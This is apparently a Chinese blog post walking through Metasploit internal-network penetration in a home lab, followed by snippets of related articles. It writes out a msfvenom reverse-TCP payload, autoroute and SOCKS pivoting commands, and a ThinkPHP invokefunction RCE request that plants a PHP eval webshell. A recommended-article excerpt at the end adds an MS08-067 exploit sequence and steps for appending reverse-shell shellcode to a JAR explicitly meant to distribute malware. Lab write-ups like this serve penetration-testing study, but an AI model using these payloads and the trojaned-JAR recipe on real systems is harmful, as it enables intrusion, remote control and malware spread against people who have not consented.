MSF内网渗透

最新推荐文章于 2024-02-21 15:17:44 发布

原创最新推荐文章于 2024-02-21 15:17:44 发布

· 541 阅读

1 ·

版权

文章标签：

#服务器 #安全 #linux

环境搭建

windows server 2008 ：asp站点双网卡 192.168.5.24 -10.10.10.8
win7 ：内网主机开放80web服务使用thinkphp搭建 10.10.10.9
kali：攻击机 192.168.5.51

目标 : 拿下两台主机的权限

复现步骤

（省略搭建站点步骤）给win2008添加一张网卡保证可以与内网主机win7相互通信 kali访问asp站点

getshell后（省略getshell步骤直接演示内网渗透）反弹到msf进行内网渗透

msf设置好监听生成反向木马上传到webshell并运行

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.51 LPORT=8001 -f exe -o /tmp/lssam.exe

拿到的会话是低权限账户利用烂土豆进行提权

查看上线主机内网路由我们先获取目标内网相关信息，可以看到该主机上的网卡有两个网段

run get_local_subnets

添加这边模拟的10网段的内网路由

run autoroute -s 10.10.10.0/24 # 添加到达10.10.10.0网段的路由
run autoroute -p # 打印路由信息

添加好路由了 , 紧接着使用msf扫描一下内网存活的主机（这里略过扫描时间太长...)此时只是把msf整个工具拖到了10内网中 , 但是kali机器上的其他工具是无法访问到10段的 ,我们可以使用socks_proxy解决这个问题。

background
use auxiliary/server/socks_proxy
show options
run

修改kali的/etc/proxychains4.conf文件

vim /etc/proxychains4.conf
socks5 127.0.0.1 1080

使用代理打开火狐浏览器访问win7站点测试

存在rce nday , 直接使用payload打

写入一句话蚁剑链接

http://10.10.10.9/index.php/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST[888]);?>" > cm.php

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

恸.283

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

【网络安全】MSF内网渗透

你在看屏幕的同时，屏幕也在注视着你

06-04

3144

内网渗透超级强悍

47-4 内网渗透 - MSF介绍

weixin_43263566的博客

06-15

312

Metasploit框架（Metasploit Framework, MSF）是一款开源工具，专为渗透测试设计。它由Ruby编程语言编写，具有高度的扩展性，可以方便渗透测试人员开发和使用定制化的工具模板。Metasploit提供多种接口来控制测试过程，包括控制台、Web界面和命令行界面（CLI）。推荐使用控制台接口，因为它可以访问和使用所有Metasploit的插件，如Payload、漏洞利用模块、后渗透模块等。

参与评论您还未登录，请先登录后发表或查看评论

MSF内网穿透

weixin_46686336的博客

11-08

748

MSF内网穿透

搭建内网靶场并用MSF进行内网穿透/渗透实验

Cwillchris的博客

10-17

4245

实验名称：利用MSF打穿内网实验人：XX 实验日期：2021.10.16 实验目的：利用MSF进行内网渗透实验拓扑：实验环境：所用机器网络类型 IP 默认网关 DNS 攻击机：kali NAT 172.16.12.30/24 172.16.12.2 114.114.114.114

内网安全：内网穿透详解

热门推荐

qq_61553520的博客

06-12

2万+

区别于代理技术，隧道技术，三种技术都有解决通讯的问题，但是侧重不一样代理技术可以把外网攻击机带进内网进行渗透隧道技术解决了因为防火墙限制流量不出网的问题内网穿透解决和内网主机建立连接的问题，可以远程访问内网的服务器要根据不同使用场景来选择使用。

msf添加路由及socks代理进行内网穿透

2301_76227305的博客

02-21

3340

前面发过一篇cs开启socks代理实现内网穿透的，今天写一下msf添加socks代理实现内网访问以上的操作都是基于我们已经熟悉了其内网的环境，但在现实中往往要进行大量的内网信息收集工作。最后，以上仅为个人的拙见，如何有不对的地方，欢迎各位师傅指正与补充，有兴趣的师傅可以一起交流学习。

MSF内网渗透实战

hackzkaq的博客

05-17

4100

零基础学黑客，搜索公众号：白帽子左一作者：掌控安全-小熊保安本来还是想用cobalt strike，但是由于某些原因，暂时关闭了cobalt strike的服务器，正好用msf尝试做一次内网渗透熟悉熟悉，注：最初用蚁剑看了一下，此次目标主机没开杀软，所以以下内容不涉及免杀. 一、MSF生成木马上线目标 1. 生成木马使用命令： msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f ex

msf内网渗透

10-29

在IT安全领域，尤其是渗透测试和网络攻防中，“msf内网渗透”是一个关键话题，涉及到了Metasploit框架（简称MSF）在内部网络中的应用与实践。这一过程通常包括了渗透测试前的环境准备、利用MSF生成有效载荷、设置web...

三层网络靶场搭建&MSF内网渗透

2301_77147728的博客

03-23

479

在最近的CTF比赛中，综合靶场出现的次数越来越多，这种形式的靶场和真实的内网渗透很像，很贴合实际工作，但我们往往缺少多层网络的练习环境。本文通过VMware搭建3层网络，并通过msf进行内网渗透，涉及代理搭建，流量转发，端口映射等常见内网渗透技术。

MSF+内网穿透 实现远控

yxngu

05-09

1万+

网络攻防如同打仗知己知彼百战不殆要想学会防守必先知道敌人如何进攻此教程的远端测试全是我的好友帮助测试并非实际攻击！！！写一篇远程的渗透教程给大家当然不是为了教大家去黑别人电脑而是让大家明白原理，懂得如何防范，再三强调！！！使用此教程用在不正当地方造成的后果与本人无关！！！接下来开始本次教程先给大家展示一下效果吧！基于此程序可以监视对方电脑，实时屏幕抓取，甚至实时屏幕监测，还有创...

0x15.第十五课 MetaSploit实现内网存活telnet和http服务扫描.pdf

06-24

0x15.第十五课 MetaSploit实现内网存活telnet和http服务扫描.pdf

MSF多层内网渗透全过程

include_voidmain的博客

08-16

2387

MSF多层内网渗透全过程

frp对msf的shell的一个内网穿透

aicsswo的博客

11-08

1189

/frps -c frps.ini#后台运行nohup /root/frp/frps -c /root/frp/frps.ini &#结束pkill frps。如果输出的是其他的，则在文件列表中找 linux 的对应架构的压缩包。这里设置[common] 和 [mdf] 就可以用了 server_addr就是你的云服务器ip，token就是前面你设置的，其他照抄就行。.打开你的云服务器，随便你通过什么管理你的云服务器（ssh好还是其他软件能进行就ko）然后进入解压好的目录问文件：（cd命令进入）

内网渗透 Metasploit（MSF）基础使用

qq_49433473的博客

10-24

1万+

内网渗透 Metasploit（MSF）使用，信息搜集，模块详解，端口扫描，反弹shell

利用msf进行内网的木马渗透详细教程

m0_52332592的博客

11-11

4407

内网渗透木马测试

内网渗透工具MSF使用教程

CC__Faker的博客

04-01

2837

MSF介绍 Metasploit是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。这些功能包括智能开发，代码审计，Web应用程序扫描，社会工程。团队合作，在Metasploit和综合报告提出了他们的发现。常见指令 use[exploits/payloads/auxiliary] //指定一个模块并使其开始工作 show[exploits/payloads/auxiliary/options] //显

MFS 服务扫描与爆破

weixin_30585437的博客

03-20

386

MSF 服务发现常用来发现局域网内,的常见服务,比如HTTP,FTP,TELNET等. MSF模块搜索: [root@localhost ~]# msfconsole msf5 > search scanner type:auxiliary msf5 > search scanner/http type:auxiliary // 搜索所有与HTTP相关的模块发现HTT...

【转载】metasploit在内网渗透中的一些模块

weixin_30730151的博客

12-02

471

下面附上内网渗透中可能用得上的msf模块 scanner/portscan/syn SYN端口扫描scanner/portscan/tcp TCP端口扫描 auxiliary/scanner/smb/smb_login SMB登录测试扫描use windows/smb/psexec ...

内网渗透msf

最新发布

03-15

### 关于 Metasploit 框架在内网渗透中的应用 #### 什么是 Metasploit？ Metasploit 是一种功能强大的开源渗透测试框架，广泛应用于网络安全评估和漏洞研究领域。该框架提供了丰富的模块化设计，支持多种类型的攻击向量以及后渗透阶段的操作工具[^1]。 #### 内网渗透的主要过程内网渗透通常遵循标准化的渗透测试流程，具体分为以下几个部分： - **前期交互 (Pre-engagement Interactions)** 此阶段涉及与客户沟通以明确目标范围、时间安排以及其他约束条件等内容[^2]。 - **情报收集 (Intelligence Gathering)** 利用公开资源或技术手段搜集有关目标网络的信息，例如 IP 地址、开放端口和服务版本等数据。 - **威胁建模 (Thread Modelling)** 对所获得的情报进行分析处理，并识别潜在的安全风险点。 - **漏洞分析 (Vulnerability Analysis)** 运用扫描器或其他自动化工具检测系统中存在的弱点，同时验证其真实性。 - **渗透攻击 (Exploitation)** 配置合适的exploit模块针对发现的目标服务发起实际攻击尝试获取控制权^。 - **后渗透攻击 (Post Exploitation)** 成功入侵之后进一步探索内部环境寻找敏感资料或者横向移动至其他主机上继续扩展访问权限^。 - **报告撰写 (Reporting)** 将整个过程中遇到的问题汇总整理成文档形式提交给委托方作为改进依据^。 #### 使用案例：通过 MS08-067 漏洞实现远程代码执行假设存在一台运行 Windows Server 2003 的服务器未修补 CVE-2008-4250（即著名的 MS08-067），可以按照如下方式利用 Metasploit 来完成对该机器的接管工作： ```bash use exploit/windows/smb/ms08_067_netapi set RHOSTS <target_ip> set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <local_ip> set LPORT <listening_port> run ``` 上述命令序列依次完成了指定目标地址、选择有效载荷类型及其参数设置最后启动攻击动作的任务描述[^3]^。另外，在某些特殊场景下如果目标环境中部署有 Java 应用程序，则还可以考虑采用基于 JVM 层面存在的缺陷来进行突破尝试。比如下面这个例子展示了如何创建一个带有隐藏功能的 JAR 文件用于分发传播恶意软件实例： ```java import java.io.*; public class Evil { public static void main(String[] args){ try{ Runtime.getRuntime().exec("cmd /c start calc.exe"); }catch(Exception e){} } } // Compile and package into a jar file. javac Evil.java && jar cvfe evil.jar Evil.class . ``` 接着再配合 `msfvenom` 工具生成自定义 payload 并嵌入到刚才准备好的载体当中去形成最终成品供后续投放使用[^4]^。 ```bash msfvenom -p generic/shell_reverse_tcp LHOST=<your_IP> LPORT=<port_number> -f raw > shellcode.bin cat shellcode.bin >> evil.jar zip -A evil.jar ``` 以上便是关于如何运用 Metasploit 开展内网渗透活动的一些基础知识和技术要点概述。